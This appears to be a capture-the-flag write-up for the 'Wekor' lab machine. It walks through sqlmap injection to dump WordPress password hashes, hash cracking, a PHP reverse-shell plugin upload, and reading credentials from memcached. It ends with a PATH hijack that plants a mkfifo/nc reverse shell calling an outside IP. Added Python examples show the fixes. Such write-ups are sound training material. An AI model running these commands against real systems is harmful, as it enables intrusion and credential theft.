CTF Wekor

  1. rustscan
  2. robots.txt
  3. Gobuster
  4. SQL injection
    1. Wordpress
  5. Reverse shell
  6. Upgrade the shell
  7. Privesc
  8. Privesc to root
  9. Other solution for privesc

rustscan

```bash
rustscan -a 10.10.140.46
```

```text
Open 10.10.140.46:22
Open 10.10.140.46:80
```

robots.txt

```text
User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
```

Visiting http://10.10.140.46/comingreallysoon/ points us to this website:
http://10.10.140.46/it-next/

Gobuster

```bash
gobuster dir -u http://10.10.140.46/it-next/ -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

SQL injection

The coupon_code parameter of the cart page is injectable. List the databases:

```bash
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" --dbs
```

List the tables of the wordpress database:

```bash
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress --tables
```

Dump the table wp_users:

```bash
sqlmap -u http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress -T wp_users --dump
```
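As an added illustration (not code from the write-up or from the target application), here is the vulnerability class sqlmap found in the coupon_code parameter, shown against a constructed SQLite coupon table: a lookup that concatenates the submitted value into the query text, beside the parameterized version that closes the hole. The table, column names and coupon values are assumptions; the real it_cart.php code is not on the page.

```python
"""
Added example, not from the Wekor write-up: why a coupon lookup built by string
concatenation is injectable, and the parameterized form that is not.
"""
import sqlite3

# Constructed sample data standing in for the shop's coupon table (assumption).
COUPONS = [("SAVE10", 10), ("VIP50", 50)]


def make_db():
    """In-memory SQLite database with a tiny coupons table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, percent INTEGER)")
    conn.executemany("INSERT INTO coupons VALUES (?, ?)", COUPONS)
    return conn


def lookup_vulnerable(conn, coupon_code):
    """The user-supplied value becomes part of the SQL text, so a quote in it
    changes the statement's structure. This is the pattern sqlmap exploits
    to enumerate databases and dump tables through one form field."""
    sql = "SELECT code, percent FROM coupons WHERE code = '%s'" % coupon_code
    return conn.execute(sql).fetchall()


def lookup_safe(conn, coupon_code):
    """Parameter binding: the value travels separately from the statement and
    is compared as data, never parsed as SQL."""
    sql = "SELECT code, percent FROM coupons WHERE code = ?"
    return conn.execute(sql, (coupon_code,)).fetchall()


def demo():
    """Run the same inputs through both lookups and return what each sees."""
    conn = make_db()
    tautology = "' OR '1'='1"
    return {
        "normal": lookup_safe(conn, "SAVE10"),
        "vulnerable": lookup_vulnerable(conn, tautology),
        "safe": lookup_safe(conn, tautology),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the concatenated query the tautology returns every coupon; with the bound parameter the same string matches nothing, because there is no coupon literally named `' OR '1'='1`. In the WordPress-backed shop on this box the fix is the same: prepared statements (or `$wpdb->prepare`) for every value that comes from the request.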

Let's put those hashes into a file and crack them with john:

```text
$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
```

```bash
john hashs --wordlist=/home/peanutstick/Documents/arch_doc/CTF/Wordlist/rockyou.txt
```

Log in with wp_yura:soccer13.

Wordpress

The WordPress site is at http://site.wekor.thm/wordpress/. You need to add site.wekor.thm to your /etc/hosts to reach it.

Reverse shell

Via the plugin upload. First zip the reverse shell:

```bash
zip rev.zip revershell.php
```

Upgrade the shell

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm # allow clear command
```

Then Ctrl + Z.

```bash
stty raw -echo; fg # allow auto completion
```

Privesc

There is the tool memcached-tool in /usr/share/memcached/scripts. With it we can dump what is stored in the memcached instance running on port 11211:

```bash
/usr/share/memcached/scripts/memcached-tool localhost:11211 dump
```

Output:

```text
Dumping bucket 1 - 5 total items
add id 0 1676753794 4
3476
add username 0 1676753794 4
Orka
add salary 0 1676753794 8
$100,000
add password 0 1676753794 15
OrkAiSC00L24/7$
add email 0 1676753794 14
Orka@wekor.thm
```

This gives us Orka's password in clear text: OrkAiSC00L24/7$

Privesc to root

```bash
sudo -l
```

sudo -l lists a binary we can run as root. Let's dig into it:

```bash
strings /home/Orka/Desktop/bitcoin
```

It calls python. Let's check whether a python exists in /usr/sbin:

```bash
Orka@osboxes:~$ ls /usr/sbin/python
ls: cannot access '/usr/sbin/python': No such file or directory
```

Let's create it:

```bash
export PATH="/usr/sbin:$PATH"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.50.167 6666 >/tmp/f" > /usr/sbin/python
chmod +x /usr/sbin/python
sudo Desktop/bitcoin
```

I’m root.
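Added example, not from the write-up: a small checker for the condition this root escalation relies on. The bitcoin binary invokes python by bare name, so the interpreter is resolved through the search path, and any directory earlier in that path that an ordinary user can write to lets a planted python win the lookup. `audit_path` reports such directories and `shadows_before` narrows them to the ones that can actually shadow the genuine interpreter. `SECURE_PATH` is sudo's customary default (an assumption; confirm it with `sudo -l`), and `SAMPLE_DIR_INFO` is a constructed stand-in that models /usr/sbin as user-owned, which is one way to explain why Orka could create /usr/sbin/python; the page itself does not show the directory's ownership.

```python
"""
Added example, not part of the Wekor write-up: find PATH directories that a
non-root user could write to, i.e. the precondition for a PATH hijack like the
one used against the bitcoin binary.
"""
import os
import stat

# sudo's customary default secure_path (assumption; confirm with `sudo -l`).
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def is_hijackable(uid, gid, mode):
    """True if a non-root principal can create files in a directory with the
    given owner uid, group gid and st_mode. World-writable counts even when the
    sticky bit is set: the sticky bit protects existing entries, it does not
    stop someone creating a new file named `python`."""
    if mode & stat.S_IWOTH:
        return True
    if gid != 0 and mode & stat.S_IWGRP:
        return True
    if uid != 0 and mode & stat.S_IWUSR:
        return True
    return False


def audit_path(path_string, dir_info):
    """PATH entries, in lookup order, that a non-root user could write to.
    dir_info maps directory -> (uid, gid, st_mode); entries absent from it
    are skipped."""
    findings = []
    for directory in path_string.split(":"):
        if directory in dir_info and is_hijackable(*dir_info[directory]):
            findings.append(directory)
    return findings


def shadows_before(path_string, dir_info, genuine_dir):
    """Hijackable entries searched before genuine_dir. Only these can shadow
    a binary that really lives in genuine_dir (here: /usr/bin for python)."""
    findings = []
    for directory in path_string.split(":"):
        if directory == genuine_dir:
            break
        if directory in dir_info and is_hijackable(*dir_info[directory]):
            findings.append(directory)
    return findings


def live_dir_info(path_string):
    """Collect (uid, gid, st_mode) for the directories of path_string on this host."""
    info = {}
    for directory in path_string.split(":"):
        try:
            st = os.stat(directory)
        except OSError:
            continue  # missing or unreadable entry: nothing to assess
        info[directory] = (st.st_uid, st.st_gid, st.st_mode)
    return info


# Constructed sample: every directory root-owned 0755 except /usr/sbin, which
# is owned by an ordinary user (uid 1000). The write-up creates /usr/sbin/python
# as Orka, so that directory must have been writable by that user; user
# ownership is one way to model it (assumption). Values are st_mode bits.
SAMPLE_DIR_INFO = {
    "/usr/local/sbin": (0, 0, 0o40755),
    "/usr/local/bin": (0, 0, 0o40755),
    "/usr/sbin": (1000, 1000, 0o40755),
    "/usr/bin": (0, 0, 0o40755),
    "/sbin": (0, 0, 0o40755),
    "/bin": (0, 0, 0o40755),
}

if __name__ == "__main__":
    print("sample, can shadow /usr/bin/python:",
          shadows_before(SECURE_PATH, SAMPLE_DIR_INFO, "/usr/bin"))
    here = os.environ.get("PATH", "")
    print("this host:", audit_path(here, live_dir_info(here)))
```

On the sample the only finding is /usr/sbin, and it sits before /usr/bin, which is exactly why the planted script runs. The remediation follows from the same check: restore root ownership and 0755 on every secure_path directory, and have privileged wrappers call their interpreter by absolute path (/usr/bin/python3) instead of relying on the search path at all.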

Other solution for privesc